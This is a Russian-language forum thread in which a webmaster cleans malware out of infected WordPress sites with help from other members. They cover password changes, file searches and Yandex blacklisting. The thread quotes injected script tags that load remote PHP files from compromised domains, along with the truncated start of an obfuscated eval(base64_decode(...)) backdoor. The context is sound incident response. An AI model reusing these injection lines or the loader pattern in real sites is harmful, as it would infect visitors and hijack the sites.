Сообщений в теме: 42

[Катя (Aki Astarta)]

Дела такие: пришла еще жалоба, теперь на то, что браузеры не пускают на мой сайт, заявляя, что я распространяю вредоносное ПО И выдают точно такие же страшные красные картинки. как в вашем сообщении выше, Сергей, только теперь про мой сайт. Это скрипты такое натворили?

 

Удаляйте.

Удалила и одну и вторую ссылку. Шаблон вроде не развалился (пока что).

 

Что еще нужно делать в подобных случаях?

И почему мне не один браузер не сказал, что на сайте беда?

И откуда вообще взялись эти фреймы-ссылки?

 

Проверить шаблоны на наличие внешних ссылок и вредоносного кода хорошо помогает плагин ТАС для Wordpress.

У меня стоит этот плагин, Сергей. Я так поняла, что он обнаруживает не все ссылки. Потому что этих он не увидел и еще несколько штук вордпрессовских он также не обнаруживает, хотя RDS-бар их показывает.

а свой урл можно проверить хотя бы тут https://www.virustotal.com/ru/#url

Проверила еще раз урл (главную), все чисто.

[Сергей (ex-Gudvin)]

Дела такие: пришла еще жалоба, теперь на то, что браузеры не пускают на мой сайт, заявляя, что я распространяю вредоносное ПО И выдают точно такие же страшные красные картинки. как в вашем сообщении выше, Сергей, только теперь про мой сайт. Это скрипты такое натворили?

 

Скорее всего, да, т.к. других проблем на сайте не видно.

 

Жалобы от посетителей с планшетов?

 

Удалила и одну и вторую ссылку. Шаблон вроде не развалился (пока что).

 

Он и не развалится. Но, насколько я вижу, Вы удалили не весь вредоносный код:

 

 

Что еще нужно делать в подобных случаях?

 

Не исключено, что сайт взломали, т.к. по Вашим словам, раньше подобных проблем не было... В любом случае, не будет лишним сменить пароли:

 

- от хостинга сайта

- от админки сайта

- от FTP-доступа к сайту

- от базы данных сайта

- от почтового ящика, куда приходят с хостинга/сайта данные для доступа

 

И не делайте пароли простыми!

 

Ну а далее, найти весь вредоносный код на сайте и удалить его.

 

И почему мне не один браузер не сказал, что на сайте беда?

 

Как я писал выше, возможно, вредоносный код подгружается на сайт только тогда, когда на сайт заходят с мобилных устройств (смартфонов, планшетов и т.д.). Ещё возможно, что сайт был взломан совсем недавно и Вы сами ещё не успели попасть на подгрузку вредоносного кода, т.к. он подгружается в ротации с безобидным.

 

И откуда вообще взялись эти фреймы-ссылки?

 

Фреймы создаёт скрипт. Скрипт могли прописать либо изначально либо недавно (взломав сайт) в шаблоне... Также, данный скрипт в страницы сайта может вставлять какой-нибудь плагин или просто вредоносный код, прописанный где-нибудь в файлах движка либо загруженный отдельным файлом.

 

У меня стоит этот плагин, Сергей. Я так поняла, что он обнаруживает не все ссылки. Потому что этих он не увидел и еще несколько штук вордпрессовских он также не обнаруживает

 

Да, возможно, он показывает только ссылки прописанные непосредственно в шаблоне, а не подгружаемые через скрипт...

[Катя (Aki Astarta)]

Жалобы от посетителей с планшетов?

Увы, стационарный компьютер.

 

Пароли поменяла по списку - везде, где только можно. Они и не были простыми (буквы+цифры), а теперь нереально сложные: в жизни не вспомню и не воспроизведу, если вдруг понадобится  

 

насколько я вижу, Вы удалили не весь вредоносный код:

Этого когда нет в шаблонах темы, пролистала все шаблоны - вплоть до search.php, а его нет   Значит, он не только тут, но и где-то еще спрятался... или "перебежал"...

 

 

Скрипт могли прописать либо изначально либо недавно (взломав сайт) в шаблоне... Также, данный скрипт в страницы сайта может вставлять какой-нибудь плагин или просто вредоносный код, прописанный где-нибудь в файлах движка либо загруженный отдельным файлом.

Изначально прописать по логике - не подходит: сайту больше года и если бы эта гадость была сразу, она бы уже давно вылезла, я так думаю.

Раз в шаблонах этого скрипта сейчас нет, значит, надо лезть во внутренности сайта (в диспетчер файлов) и искать его теперь вручную в каждом файле?

Обидно, что яндекс.вебмастер говорит, что на сайте вредоносный код не обнаружен.

[Сергей (ex-Gudvin)]

Этого когда нет в шаблонах темы, пролистала все шаблоны - вплоть до search.php, а его нет Значит, он не только тут, но и где-то еще спрятался... или "перебежал"...

 

Раз в шаблонах этого скрипта сейчас нет, значит, надо лезть во внутренности сайта (в диспетчер файлов) и искать его теперь вручную в каждом файле?

 

Если в админпанели хостинга нет поиска по содержимому файлов, то выгрузите весь сайт на компьютер и поищите файлы в которых может встречаться слово "psy-ufa" с помощью Total Commander:

 

 

или стандартного поиска ОС Windows (Пуск -> Поиск -> Файлы и папки):

 

 

Обидно, что яндекс.вебмастер говорит, что на сайте вредоносный код не обнаружен.

 

Это он пока не видит, но если не исправить ситуацию, то поисковики повесят на Ваш сайт вот такой ярлычок:

 

[Максим (zateh)]

Это он пока не видит, но если не исправить ситуацию, то поисковики повесят на Ваш сайт вот такой ярлычок:

Вот вот, у меня уже одному сайту на ВП такой ярлычок привесили обнаружил у себя в заголовке и в подвале вот такой скриптик:

 <script type="text/javascript" src="http: //profoodcorp.spb.ru/wp-includes/google-analytics.php"></script>

это похоже на какую-то уязвимость самого движка, хотя сейчас пароли поменял, посмотрим.

[Катя (Aki Astarta)]

или стандартного поиска ОС Windows (Пуск -> Поиск -> Файлы и папки):

Этот нашел только один файл. А

с помощью Total Commander:

целых 19, в том числе и wp-login.php, с которого и началась вся эта история.
 
Сейчас чищу все эти файлы по очереди.
 
Самое главное, что при загрузке файлов сайта на комп, антивирус стал ругаться на файл, расположенный в папке с плагинами, сказал, что это троян гадостливый: HEUR:Trojan.Script.Generic

Оказалось, что это троян-даунлоадер, то есть сама по себе софтина безвредная, но загружает посетителю сайта вирусню.
Сайт был полностью слит и проверен антивирусом, результат — ни-че-го. Как оказалось, пока сайт не запущен через браузер, никаких вирусов нет. Это происходит из-за того, что весь вирус это проста строчка в коде

Источник тутова
 
Я так понимаю, что именно этот файл и есть источник заразы? В нем код начинается с:

<?php eval(base64_decode("CiRhdXRoX3Bhc3MgPSAiN2U5NDI0YmZhMTJkMWYyYWQzMjQ2M2FjMW

...и далее идет бессмысленный набор буков на кучу строк.
 
Файл удалила. Вожусь.
 

/* Always have wp_head() just before the closing <script language="JavaScript" src="http://www.insightcrime.org/media/system/js/jquery-1.6.5.min.js" type="text/javascript"></script><script type="text/javascript" src="http://psy-ufa.ru/wp-includes/images/wlw/1/404.php"></script>

Строка из зараженного файла хедер неактивной темы сайта.
Типа всегда перед закрыванием проигрывать скрипт?

И еще...если на хостинге несколько сайтов, надо ведь их все проверить?

[Андрей Бер]

Да, и если я верно понял, то нужно пройтись по всем сайтам. Плюс пароли сменить везде и ОБНОВИТЬ все. Я помню что версия выла не свежая у вп на сайте, и про обновления я уже писал вам.

[Катя (Aki Astarta)]

Да, и если я верно понял, то нужно пройтись по всем сайтам.

Второй сайт зараженный Посещаемость упала в два раза. Опять чистить...

Ночью закончила возиться с сайтом №1, на сейчас в исходном коде страниц скрипта не видно. Есть шансы на победу   Тьфу-тьфу-тьфу...

[Катя (Aki Astarta)]

Вирус может прописаться в картинках?

На сайте №3 тотал командер показывает наличие psy в картинках png и gif. В названиях картинок сочетания нет.

[Сергей (ex-Gudvin)]

обнаружил у себя в заголовке и в подвале вот такой скриптик:

 

это похоже на какую-то уязвимость самого движка

 

Больше похоже на то, что загрузили через FTP вредоносный файл и прописали в шаблоне подгрузку этого файла.

 

хотя сейчас пароли поменял, посмотрим

 

И пароли нужно поменять:

 

- от хостинга сайта

- от админки сайта

- от FTP-доступа к сайту

- от базы данных сайта

- от почтового ящика, куда приходят с хостинга/сайта данные для доступа

 

Самое главное, что при загрузке файлов сайта на комп, антивирус стал ругаться на файл

 

Это, кстати, один из способов проверки сайта на наличие вирусов, прописанных по-простому...

 

Я так понимаю, что именно этот файл и есть источник заразы? В нем код начинается с:

 

...и далее идет бессмысленный набор буков на кучу строк.

 

Похоже на то... И, возможно, только один из источников заразы. Что там закодировано можно посмотреть здесь, здесь или здесь...

 

Файл удалила. Вожусь.

 

Надеюсь, Ваш хостер делает ежедневные бекапы базы и файлов сайта...

 

Строка из зараженного файла хедер неактивной темы сайта. Типа всегда перед закрыванием проигрывать скрипт?

 

Не совсем Вас понял, Перед каким закрытием? Что проигрывает?

 

Да, и если я верно понял, то нужно пройтись по всем сайтам. Плюс пароли сменить везде и ОБНОВИТЬ все.

 

Это мы сделали в первую очередь в личной беседе... А вот если движки, на которых работают сайты, не обновлены до актуальных версий, то да, нужно обязательно обновиться и делать это постоянно, т.к. новые версии как движков так и плагинов, это не только новый функционал, но и исправление ошибок и безопасности.

 

Вирус может прописаться в картинках?

 

Может.

 

На сайте №3 тотал командер показывает наличие psy в картинках png и gif.

 

Вам не нужно просто "psy"? Вам нужно "psy-ufa"...

 

 

P.S. Ребят, используйте, пожалуйста, для вставки кода в сообщения специальный тег:

 

 

Спасибо.

[Катя (Aki Astarta)]

Фух, вроде бы все.

Сергей, если можно, проверьте, пожалуйста  
 

Похоже на то... И, возможно, только один из источников заразы. Что там закодировано можно посмотреть здесь, здесь или здесь...

Файл удалила, ничего не посмотрю, но больше антивирус не ругался при загрузке файлов с сайта. Такой был точно один.
 

Не совсем Вас понял, Перед каким закрытием? Что проигрывает?

Это вольный авторский перевод и интерпретация первых строк Always have wp_head() just before the closing:blush: "Типа всегда перед закрыванием проигрывать скрипт?". Просто это единственные строки, написанные человеческим языком, которые сопровождают вредоносный скрипт. Решила, что имеют смысл.

 

Надеюсь, Ваш хостер делает ежедневные бекапы базы и файлов сайта...

Не, ежедневные не делает. И я забыла сделать Буду надеяться, что серьезных последствий не будет, ничего не утеряется и не поломается. Старалась очень аккуратно код чистить   И из файлов целиком удалила только несколько картинок и тот файл, на который ругался антивирус. Вроде не смертельно)
 

нужно обязательно обновиться и делать это постоянно, т.к. новые версии как движков так и плагинов, это не только новый функционал, но и исправление ошибок и безопасности.

Если честно, боюсь обновляться   Один раз обновилась и тема стала кривой, то ли сайдбар куда-то перелез, то ли футер, уже не помню. Конечно, вернулась к прежней версии, поскольку ручки не очень ровненькие. И это гораздо проще, чем разбираться в коде и искать ошибки... Но раз такое дело, буду бороться со своим страхом

 

Ребят, используйте, пожалуйста, для вставки кода в сообщения специальный тег:

Хорошо Сергей, а этот специальный тег он что-то особенное делает с кодом? Его читать потом легче или...?

[Максим (zateh)]

И пароли нужно поменять:

Да везде и поменял!

Возможно и по FTP подгрузили что-то, были на сайте и зараженные файлы, снес сайт и залил из резервной копии по новой, вирусов больше не находит, посмотрю, как будут развиваться события.

А вообще у меня только один сайт на ВП и я что-то не в восторге от данного движка, имхо.

[Сергей (ex-Gudvin)]

Фух, вроде бы все. Сергей, если можно, проверьте, пожалуйста

 

У Вас и сайт стал загружаться намного быстрее, чем раньше. Явных признаков вредоносного кода на сайте не видно, а далее, время покажет...  Как Вам говорили выше, обязательно поменяйте пароли от:

 

- от хостинга сайта

- от админки сайта

- от FTP-доступа к сайту

- от базы данных сайта

- от почтового ящика, куда приходят с хостинга/сайта данные для доступа

 

Обновите движки сайтов и плагины до актуальных версий, и делайте это постоянно.

 

Это вольный авторский перевод и интерпретация первых строк Always have wp_head() just before the closing:blush: "Типа всегда перед закрыванием проигрывать скрипт?".

 

Ясно.

 

а этот специальный тег он что-то особенное делает с кодом? Его читать потом легче или...?

 

И читать легче и в целях безопасности для форума...

[Катя (Aki Astarta)]

У Вас и сайт стал загружаться намного быстрее, чем раньше. Явных признаков вредоносного кода на сайте не видно, а далее, время покажет...

УРАААА!

 

Как Вам говорили выше, обязательно поменяйте пароли от:

Сергей, после вашей первой рекомендации сделала это сразу.

 

Очень хочу поблагодарить вас (уже ведь можно ) за внимательность, за то, что не бросили меня в беде, подсказывали на каждом этапе, что и как делать, и помогли решить вопрос. Без вас бы не справилась. Огромное вам спасибо за участие. Сергей, вы - золото этого форума   

[Катя (Aki Astarta)]

Это он пока не видит, но если не исправить ситуацию, то поисковики повесят на Ваш сайт вот такой ярлычок: Image9.jpg

Наконец-то повесил Яндекс вот такой ярлычок Чего нашел - непонятно, вердикт в панели Вебмастера "Поведенческий анализ".

 

Видимо, все-таки нужно искать специалиста

 

Порекомендуйте, пожалуйста, кто сталкивался с  такими историями, человека, который бы смог проверить и в случае необходимости подлечить сайты. Желательно в приемлемом ценовом диапазоне (пока я не миллионер )

[Катя (Aki Astarta)]

Интересно, по результатам вот этого сканнера http://sitecheck.sucuri.net/scanner/

один сайт с хостинга в список опасных занесен Яндексом, второй - гуглом, а третий - чист как младенец.

 

А главное результат сканирования "опасных" сайтов:

Site blacklisted, malware not identified (сайт в черном списке, но вредоносное ПО не обнаружено )

[Сергей (ex-Gudvin)]

Наконец-то повесил Яндекс вот такой ярлычок Чего нашел - непонятно, вердикт в панели Вебмастера "Поведенческий анализ".

 

С точно такой же проблемой на днях обращался Денис (Волхв)... При этом на сайт ругался только Яндекс и тоже с такой же пометкой "Поведенческий анализ". Прочие проверки не нашли на сайте каких-либо проблем. Насколько я понял, помогло обращение в Яндекс:

 

 

 

Ярлычок "Сайт может угрожать безопасности вашего компьютера или мобильного устройства" убрали на следующий же день.

 

А главное результат сканирования "опасных" сайтов: Site blacklisted, malware not identified (сайт в черном списке, но вредоносное ПО не обнаружено )

 

Так это как раз то, что у Вас "нашёл" Яндекс:

 

[Катя (Aki Astarta)]

При этом на сайт ругался только Яндекс и тоже с такой же пометкой "Поведенческий анализ". Прочие проверки не нашли на сайте каких-либо проблем. Насколько я понял, помогло обращение в Яндекс:

 

Вчера оставила им запрос на проверку, посмотрим, чем дело кончится.

 

Думаю, что все равно будет лучше, если специалист проверит все сайты, вылечит всех больных и наколдует защиту. Так, по крайней мере, будет ясно, что с сайтами действительно все в порядке, а не мне так захотелось)

 

Так это как раз то, что у Вас "нашёл" Яндекс:

ну да, радует, что "виновник торжества" указан...

[Максим (zateh)]

По своему опыту скажу, что перепроверки ждал две недели, но в итоге таки проверили и ярлык "опасного" с сайта сняли

чего и вам желаю!

[Катя (Aki Astarta)]

zateh, спасибо за пожелание) Пусть будет!

Две недели - это очень долго... переходы с поиска уже упали в три раза и клиенты перепуганы...и попробуй объясни, что Яндекс тоже может ошибаться...